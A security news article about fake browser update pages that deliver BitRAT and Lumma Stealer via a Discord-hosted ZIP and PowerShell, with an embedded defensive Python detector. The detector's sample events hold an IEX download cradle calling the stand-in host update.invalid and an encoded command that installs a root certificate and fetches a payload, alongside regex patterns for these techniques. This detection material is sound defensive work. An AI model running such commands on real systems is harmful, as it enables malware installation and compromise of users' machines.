Fake Browser Updates Deliver BitRAT and Lumma Stealer Malware

Jun 3, 2024 | News





Fake Browser Updates Delivering Malware: A Growing Threat

Cybercriminals are employing fake browser updates to deliver a variety of malicious payloads, including remote access trojans (RATs) and information stealers such as BitRAT and Lumma Stealer. This tactic, previously associated with the SocGholish malware, has been identified in new attacks by cybersecurity firm eSentire.

How the Attack Works

The attack begins when a user visits a compromised website containing JavaScript that redirects them to a fake browser update page, such as “chatgpt-app[.]cloud”. The bogus update page prompts the user to download a ZIP file (“Update.zip”) hosted on Discord. Inside the ZIP file is a JavaScript file (“Update.js”) that executes PowerShell scripts to download further payloads, including BitRAT and Lumma Stealer, from remote servers.

The Malware

  • BitRAT: A versatile RAT that allows attackers to harvest data, mine cryptocurrency, download additional binaries, and remotely control the infected systems.
  • Lumma Stealer: A commodity information stealer available for purchase, capable of capturing data from web browsers, crypto wallets, and other sensitive information.


Distribution via Discord

Threat actors frequently use Discord as a distribution channel for malware. Bitdefender recently reported over 50,000 dangerous links circulating on Discord, spreading malware, phishing campaigns, and spam. Hosting the fake update's ZIP file on Discord is another instance of the platform being abused to deliver payloads from a domain users tend to trust.

New Attack Variants

A recent report from ReliaQuest highlighted a variant of the ClearFake campaign that tricks users into copying and pasting malicious PowerShell code. This tactic involves a deceptive website that instructs users to fix a display issue by installing a root certificate and running obfuscated PowerShell commands, ultimately downloading and executing Lumma Stealer.
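Both chains described above end in the same place: PowerShell launched from an unusual parent (the JScript host running "Update.js") or with an operator-pasted command line that installs a root certificate and pulls a payload from a remote server. The following Python detector, written for this page as an illustration and not taken from eSentire, ReliaQuest or the article, shows how a defender can flag those traits in process-creation telemetry. The event fields, rule names and sample events are this example's own constructions; the sample command lines use the reserved domain `update.invalid` and are not indicators from the campaign.

```python
"""Flag PowerShell process starts that match the fake-update delivery chain.

Constructed example: field names mirror what a Sysmon Event ID 1 or EDR
process-start record would carry, but nothing here is real telemetry.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the started process
    command_line: str   # command line as logged


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # what runs a .js dropped from a ZIP
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download cradles commonly seen in stager one-liners.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer",
    re.IGNORECASE)
# Root-store certificate installs via the cmdlet or certutil.
ROOT_CERT_RE = re.compile(
    r"import-certificate.*localmachine\\root"
    r"|certutil(?:\.exe)?\s+.*-addstore\s+(?:-f\s+)?root\b",
    re.IGNORECASE)
# -EncodedCommand and its unambiguous prefixes, followed by a base64 blob.
ENCODED_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE)
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (base64 over UTF-16LE), if any."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event: ProcEvent) -> List[str]:
    """Rule names that fire for one PowerShell start; empty list otherwise."""
    findings: List[str] = []
    if basename(event.image) not in POWERSHELL:
        return findings
    if basename(event.parent_image) in SCRIPT_HOSTS:
        findings.append("script_host_spawned_powershell")
    text = event.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append("encoded_command")
        text = text + "\n" + decoded      # inspect the decoded script too
    if HIDDEN_RE.search(text):
        findings.append("hidden_window")
    if DOWNLOAD_RE.search(text):
        findings.append("download_cradle")
    if ROOT_CERT_RE.search(text):
        findings.append("root_cert_install")
    return findings


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map event index to its findings, keeping only events that fired."""
    return {i: f for i, e in enumerate(events) if (f := evaluate(e))}


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (used
    here only to construct sample input)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    # Update.js run by wscript.exe launching a hidden download cradle
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS,
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://update.invalid/s.ps1')\""),
    # user-pasted, encoded command that installs a root cert and fetches a payload
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              "powershell.exe -NoP -EncodedCommand " + encode_command(
                  r"Import-Certificate -FilePath $env:TEMP\r.cer "
                  r"-CertStoreLocation Cert:\LocalMachine\Root; "
                  "iwr http://update.invalid/l.zip")),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              "powershell.exe -Command Get-Process | Sort-Object CPU"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, basename(SAMPLE_EVENTS[idx].parent_image), hits)
```

Run stand-alone, the script reports only the second and third events. The useful property is that the encoded variant is caught by decoding the command line before matching, so the same cradle and certificate rules apply whether the operator pasted plain or base64 text; in a real deployment these rules would be fed by the EDR's process-start stream and tuned against the environment's own administrative PowerShell usage.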

Rise in Lumma Stealer Activity

Lumma Stealer has become increasingly prevalent, with significant growth in logs listed for sale on the dark web. Its popularity among cybercriminals is attributed to its high success rate in infiltrating systems and exfiltrating data undetected.




Broader Implications

The use of fake browser updates and other deceptive tactics underscores the evolving sophistication of cyberattacks. Users must remain vigilant, verify the authenticity of software updates, and scrutinize any instructions involving command-line scripts or root certificates.

The rise of fake browser update schemes highlights the need for robust cybersecurity practices. This report emphasizes the importance of verifying software sources and being cautious of unsolicited updates and instructions, particularly those involving script execution or sensitive changes to system settings.


Source: thehackernews.com
